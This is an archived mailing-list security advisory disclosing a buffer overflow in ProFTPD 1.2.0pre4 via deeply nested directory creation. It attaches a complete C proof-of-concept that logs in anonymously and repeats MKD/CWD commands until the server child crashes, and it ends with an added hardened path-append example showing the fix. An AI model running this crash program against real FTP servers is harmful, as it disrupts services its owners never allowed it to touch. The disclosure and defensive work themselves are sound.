Hi,

I have found out yet another buffer overflow in ProFTPD 1.2.0pre4, which may or may not be exploitable. I have notified the authors and other security-related persons a week ago, and I still got no answer, in spite of my repost. So either they do not care, or my set-up is badly done.

Why it may not be easily exploited (or not at all): because the segmentation fault is not caused by a changed return address. The overflow will in fact change a pointer and make it point somewhere else, and then FTPD will use strlen() on it. Anyway, maybe other variables may be changed; I have not looked at it carefully yet.

How does the overflow work: this is a variation of the infamous and now-old wu-ftpd mkdir overflow (make a directory in another directory, in another directory, and so on), but this time, the name of the created directories must not exceed 255 chars. That's all.

Attached to this message is a dumb program that will just make the remote proftpd crash. Have a look at /var/log/messages, and you'll see something as fun as:

Sep 1 14:18:49 prof proftpd[5327]: ProFTPD terminating (signal 11)

(quick note: the program will not check for error codes, so make sure you have the right to create directories in the appropriate directory, or you'll get false positives/negatives).

This is *not* a DoS attack, since only a ProFTPd child will die.

I tested this flaw with proftpd 1.2.0pre4 as seen on ftp://ftp.tos.net/pub/proftpd. This problem was tested on a RedHat 6.0.

Patch: use something else / another good reason to not have anonymous writeable directories.
-- Renaud
--
Renaud Deraison
The Nessus Project
http://www.nessus.org

Attachment: crash_ftpd.c (be sure to edit this file before starting it)

#include <stdio.h>
#include <stdlib.h>
#include <string.h>      /* strlen, memset, strcat */
#include <strings.h>     /* bzero */
#include <unistd.h>      /* close */
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>   /* inet_aton */
/*
 * Crashes ProFTPd 1.2.0pre4 because of a buffer overflow.
 *
 *
 * This bug was discovered by the Nessus Security Scanner
 *
 * I don't know if this flaw can be exploited to gain
 * root privileges.
 *
 *
 * The name of the created directory must not exceed 255 chars !
 *
 *
 * Written by Renaud Deraison <deraison@cvs.nessus.org>
 *
 */

/*
 * Change this !
 */
#define TARGET "192.168.1.5"
#define WRITEABLE_DIR "/incoming"

int main()
{
 struct in_addr target;
 int soc;
 struct sockaddr_in sa;

 /* CWD into the anonymous-writeable directory first */
 char * writeable_dir = "CWD "WRITEABLE_DIR"\r\n";
 char * mkd;
 char * cwd;


 inet_aton(TARGET, &target);
 mkd = malloc(300);	bzero(mkd, 300);
 cwd = malloc(300);	bzero(cwd, 300);

 soc = socket(PF_INET, SOCK_STREAM,0);

 bzero(&sa, sizeof(sa));
 sa.sin_family = AF_INET;
 sa.sin_port   = htons(21);
 sa.sin_addr.s_addr = target.s_addr;
 if(!(connect(soc, (struct sockaddr *)&sa, sizeof(struct sockaddr_in))))
 {
  char * buf = malloc(1024);
  int i;
  /* "MKD " followed by a 254-char name (stays under the 255-char limit) */
  sprintf(mkd, "MKD ");
  memset(mkd+4, 'X', 254);
  strcat(mkd, "\r\n");

  /* "CWD " into that same 254-char name */
  sprintf(cwd, "CWD ");
  memset(cwd+4, 'X', 254);
  strcat(cwd, "\r\n");

  /* anonymous login; replies are not checked */
  recv(soc, buf, 1024, 0);
  send(soc, "USER ftp\r\n", strlen("USER ftp\r\n"),0);
  recv(soc, buf, 1024, 0);
  bzero(buf,1024);
  send(soc, "PASS joe@\r\n", strlen("PASS joe@\r\n"),0);
  recv(soc, buf, 1024, 0);
  bzero(buf, 1024);
  send(soc, writeable_dir, strlen(writeable_dir), 0);
  recv(soc, buf, 1024, 0);
  bzero(buf,1024);


  /* nest directories: MKD then CWD, 40 times; an empty reply means the child died */
  for(i=0;i<40;i++)
  {
   send(soc, mkd, strlen(mkd), 0);
   recv(soc, buf, 1024,0);
   if(!strlen(buf))
   {
    printf("Remote FTPd crashed (see /var/log/messages)\n");
    exit(0);
   }
   bzero(buf, 1024);
   send(soc, cwd, strlen(cwd), 0);
   recv(soc, buf, 1024,0);
   if(!strlen(buf))
   {
    printf("Remote FTPd crashed (see /var/log/messages)\n");
    exit(0);
   }
   bzero(buf, 1024);
  }
  printf("You were not vulnerable after all. Sorry\n");
  close(soc);
 }
 else perror("connect ");
 return(0);
}
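The bug class behind this report is worth seeing from the fixing side: a per-component limit (each directory name stays under 255 chars) does nothing to bound the total length of the current working directory, so a fixed-size path buffer is still overrun after enough nested MKD/CWD steps. The following is an added example written for this page, not code from the post or from ProFTPD; the 1024-byte buffer size, the function names and the "/incoming" starting path are constructed for illustration. It shows a hardened append that checks both the component limit and the total-length bound, and simulates the nesting loop from the attached program against it.

```c
#include <stdio.h>
#include <string.h>

/* Constructed fixed-size working-directory buffer, standing in for the kind
 * of buffer the reported overflow corrupts. 1024 is not ProFTPD's value. */
#define CWD_BUF 1024
/* Per-component limit the advisory says the crash stays under. */
#define NAME_LIMIT 255

/* Hardened directory change: append one path component to cwd only if the
 * component limit AND the total-length bound both hold.
 * Returns 0 on success, -1 when the component is rejected. */
int cwd_append(char *cwd, size_t cwd_size, const char *name)
{
    size_t nlen = strlen(name);
    if (nlen == 0 || nlen > NAME_LIMIT)
        return -1;                         /* bad or over-long component */
    if (strchr(name, '/') != NULL)
        return -1;                         /* one component at a time */
    size_t cur  = strlen(cwd);
    size_t need = cur + 1 + nlen + 1;      /* cwd + '/' + name + NUL */
    if (need > cwd_size)
        return -1;                         /* would overflow the fixed buffer */
    cwd[cur] = '/';
    memcpy(cwd + cur + 1, name, nlen + 1); /* copies the terminating NUL too */
    return 0;
}

/* Simulate the MKD/CWD loop of the attached program: descend `depth` times
 * into a freshly created 254-char directory name. Returns how many levels were
 * accepted before the total-length bound refused the next one. */
int descend(char *cwd, size_t cwd_size, int depth)
{
    char name[NAME_LIMIT + 1];
    memset(name, 'X', 254);                /* 254 'X', like the crash program */
    name[254] = '\0';
    int reached = 0;
    for (int i = 0; i < depth; i++) {
        if (cwd_append(cwd, cwd_size, name) != 0)
            break;
        reached++;
    }
    return reached;
}

int main(void)
{
    char cwd[CWD_BUF] = "/incoming";       /* constructed starting directory */
    int levels = descend(cwd, sizeof cwd, 40);
    printf("accepted %d nested levels; cwd length now %zu of %zu bytes\n",
           levels, strlen(cwd), sizeof cwd);
    return 0;
}
```

Without the `need > cwd_size` check every one of the 40 iterations would pass the component test and the fourth append would already write past a 1024-byte buffer; with it, growth stops at the third level and the server can answer with an error instead of dying.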
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:02:26 PDT